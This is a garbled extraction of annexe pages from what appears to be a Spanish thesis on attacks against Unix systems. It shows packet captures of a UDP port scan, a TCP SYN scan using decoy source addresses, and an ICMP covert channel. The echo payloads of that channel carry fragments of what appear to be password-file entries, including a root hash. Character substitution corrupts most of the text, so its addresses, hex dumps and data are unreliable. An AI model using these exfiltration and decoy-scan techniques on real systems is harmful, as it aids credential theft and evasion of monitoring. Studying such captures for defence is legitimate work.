De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 33 Paquete nro. 91 - Tiempo (7.(350(6 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 9( - Tiempo ().03)37( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(( 93+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 3+ Paquete nro. 93 - Tiempo ().03)631 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 9+ - Tiempo ().)+((91 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(3 935: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 35 Paquete nro. 95 - Tiempo ().)+(611 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 96 - Tiempo (9.6+63(9 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(+ 9Dtp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 Dtp Paquete nro. 97 - Tiempo (9.6+6503 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 9) - Tiempo 30.+5+7)9 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(5 977p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 77p Paquete nro. 99 - Tiempo 30.+55+0+ 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 100 - Tiempo 31.(5)16) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(6 9i7prA!mtp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 i7prA!mtp Paquete nro. 101 - Tiempo 31.(5)550 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 10( - Tiempo 3(.06(196 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(7 939: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 39

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O5 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete nro. 103 - Tiempo 3(.06(5)5 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 10+ - Tiempo 3(.)66136 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D() 9+0: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 +0 Paquete nro. 105 - Tiempo 3(.)66570 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 106 - Tiempo 33.6701+( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(9 9ip@6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ip@6 Paquete nro. 107 - Tiempo 3+.+7++75 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(9 9ip@6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ip@6 Paquete nro. 10) - Tiempo 35.(7+56+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(9 9ip@6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ip@6 Paquete nro. 109 - Tiempo 36.0779+0 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(9 9ip@6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ip@6

B.2.*-. Ca"tura *5% ,K@ ,can con 5eco's


Paquete Nro: 1 - Tiempo: 0.000000 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.007(1( 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.06957) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: + - Tiempo: 0.075)30 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.100* Te"" 19(.16).0.30 Paquete Nro: 5 - Tiempo: 0.075)+( 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: ff:ff:ff:ff:ff:ff

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *OJ de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.100* Te"" 19(.16).0.30 Paquete Nro: 6 - Tiempo: 0.0771+5 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 00:0!:(9:90:(a:(7: -> 8P De tino: 00:0!:(9:e1:a(:(6: Proto!o"o: #$P De !rip!i%n: 19(.16).0.100 i at 00:0!:(9:90:(a:(7 Paquete Nro: 7 - Tiempo: 0.077155 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 00:0!:(9:90:(a:(7: -> 8P De tino: 00:0!:(9:e1:a(:(6: Proto!o"o: #$P De !rip!i%n: 19(.16).0.100 i at 00:0!:(9:90:(a:(7 Paquete Nro: ) - Tiempo: 0.07)565 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.100:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 9 - Tiempo: 0.07)579 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.100:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 10 - Tiempo: 0.0)0503 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -$.T0 .eq11 2en10 Paquete Nro: 11 - Tiempo: 0.0)05(0 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -$.T0 .eq11 2en10 Paquete Nro: 1( - Tiempo: 0.0)+0+7 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: 13 - Tiempo: 0.0)++9) 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.(0* Te"" 19(.16).0.30 Paquete Nro: 1+ - Tiempo: 0.0)+505 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.(0* Te"" 19(.16).0.30 Paquete Nro: 15 - Tiempo: 0.0)6(1) 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 00:0!:(9:)6:1(:a3: -> 8P De tino: 00:0!:(9:e1:a(:(6: Proto!o"o: #$P De !rip!i%n: 19(.16).0.(0 i at 00:0!:(9:)6:1(:a3 Paquete Nro: 16 - Tiempo: 0.0)6(30 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 00:0!:(9:)6:1(:a3: -> 8P De tino: 00:0!:(9:e1:a(:(6: Proto!o"o: #$P De !rip!i%n: 19(.16).0.(0 i at 00:0!:(9:)6:1(:a3 Paquete Nro: 17 - Tiempo: 0.0)6++) 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:)6:1(:a3 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(0:+()55

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O+ de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 1) - Tiempo: 0.0)6+5+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:)6:1(:a3 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(0:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 19 - Tiempo: 0.0)7509 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -$.T0 .eq11 2en10 Paquete Nro: (0 - Tiempo: 0.0)7516 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -$.T0 .eq11 2en10 Paquete Nro: (1 - Tiempo: 0.0)77(6 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: (( - Tiempo: 0.0))0+6 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: (3 - Tiempo: 0.0))06) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -$.T0 .eq11 2en10 Paquete Nro: (+ - Tiempo: 0.0))1)+ 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()55 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: (5 - Tiempo: 0.0))376 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()55 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: (6 - Tiempo: 0.0))+50 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()55 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: (7 - Tiempo: 0.0))530 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -./N0 .eq10 2en10 3..11+60 Paquete Nro: () - Tiempo: 0.0))716 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.100:+()55 Proto!o"o: T,P De !rip!i%n: (1 > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: (9 - Tiempo: 0.0))7(3 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.100:+()55 Proto!o"o: T,P

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *OO de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


De !rip!i%n: (1 > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 30 - Tiempo: 0.0)906( 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -$.T0 .eq11 2en10 Paquete Nro: 31 - Tiempo: 0.0)9069 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -$.T0 .eq11 2en10 Paquete Nro: 3( - Tiempo: 0.0)9395 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -./N0 .eq10 2en10 3..11+60 Paquete Nro: 33 - Tiempo: 0.0)9567 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:)6:1(:a3 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(0:+()55 Proto!o"o: T,P De !rip!i%n: (1 > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 3+ - Tiempo: 0.0)9573 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:)6:1(:a3 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(0:+()55 Proto!o"o: T,P De !rip!i%n: (1 > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 35 - Tiempo: 0.0)9)76 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -$.T0 .eq11 2en10 Paquete Nro: 36 - Tiempo: 0.0)9))3 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -$.T0 .eq11 2en10 Paquete Nro: 37 - Tiempo: 0.09006) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -./N0 .eq10 2en10 3..11+60 Paquete Nro: 3) - Tiempo: 0.090(7+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:+()55 Proto!o"o: T,P De !rip!i%n: (1 > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 39 - Tiempo: 0.090(9+ 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -$.T0 .eq11 2en10 Paquete Nro: +0 - Tiempo: 1.(16)97 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()56 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()56 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: +1 - Tiempo: 1.(169(3 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()56 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()56 > )0 -./N0 .eq10 2en10 3..11+60

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O0 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete Nro: +( - Tiempo: 1.(1693) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()56 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()56 > )0 -./N0 .eq10 2en10 3..11+60

B.2.*1. Ca"tura *J% Covert C$annel 7CM!


Brame 1 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 ,'e!6 um: 0D+00+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 17 9+ 0( 63 3a (e 30 35 (3 30 +) 31 7b 0) 6b (0 70 30 36 0a 6! 96 )f 00 6+ 73 61 35 (0 7( (+ 5b 00 +0 6f 7( 73 (f 6( 6f 50 1f 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 0! 01 1( (3 65 6+ (f 6f 3a 6( (9 17 00 (0 7+ (! 30 6b (+ 37 e1 69 00 (+ 63 76 36 73 31 57 a( !0 63 +6 (f (0 (0 (0 (+ 6+ (6 a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 1e 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..1.-...:..e..<. ......I..i...... ....I.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Brame ( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 ,'e!6 um: 0D+)0+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 3) 00 6+ 73 61 35 (0 7( (+ a( 00 +) 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 00 (0 7+ (! 30 6b (+ 37 96 !0 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..t)..I......... ....?.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Brame 3 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 ,'e!6 um: 0D17(1 -!orre!t0 87entifier: 0D1)1( .equen!e number: (56 90D0100: Data 91(0 bEte :

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0. de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 (0 63 7( 7( 73 6e 17 9+ 0( 63 3a (6 61 3a 6e 65 3a 31 b) 0) 6b 30 3a 6! (a 65 7( 96 ba 00 6+ 3a (f (f 3a (7 3a 5b 00 17 6f 3a 7( 6( 30 61 (f 1f 00 (1 6f 30 6f 69 3a 67 7( 00 +0 1) 7( 3a 6f 6e 30 61 6f 0! 01 1( 76 30 7+ (f 3a 69 6f (9 +0 01 56 3a 3a 6( 3a 6e 7+ e1 3e 00 +) +3 (f 61 30 (0 3a a( !0 63 5+ 6) 75 73 3a 53 0a (6 a) 6! 61 61 73 6) 30 75 6+ 0) 00 61 6! 7( 7( 0a 3a 70 61 00 1e 76 +b 6! (f 7+ +( 65 65 +5 !0 65 30 69 6! 6f 6f 7( 67 00 a) 6( 3a 65 6f 6f 75 75 6f ..1.-...:..e..<. ......I.I>...... .....`....!"a@eb a!67oor@=?Ta"50: 0:0::0:0:,'ar"ie e:;root:;u r;"o !a";bin;ba '.too r:Q:0:0::0:0:Cou rne-again .uperu er:;root:.7aemo n:

mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M "e (-,o@ert[ ,'anne"[ !on[ ?Ping[ -[ ,omp"eto.tDt mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M "e (-,o@ert[ ,'anne"[ !on[ ?Ping[ -[ ,omp"eto.tDt mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M !at (-,o@ert[ ,'anne"[ !on[ ?Ping[ -[ ,omp"eto.tDt Brame 1 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D+00+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((3(0(++67(6565+(53++3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 17 9+ 0( 63 3a (e 30 35 (3 30 +) 31 7b 0) 6b (0 70 30 36 0a 6! 96 )f 00 6+ 73 61 35 (0 7( (+ 5b 00 +0 6f 7( 73 (f 6( 6f 50 1f 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 0! 01 1( (3 65 6+ (f 6f 3a 6( (9 17 00 (0 7+ (! 30 6b (+ 37 e1 69 00 (+ 63 76 36 73 31 57 a( !0 63 +6 (f (0 (0 (0 (+ 6+ (6 a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 1e 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..1.-...:..e..<. ......I..i...... ....I.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

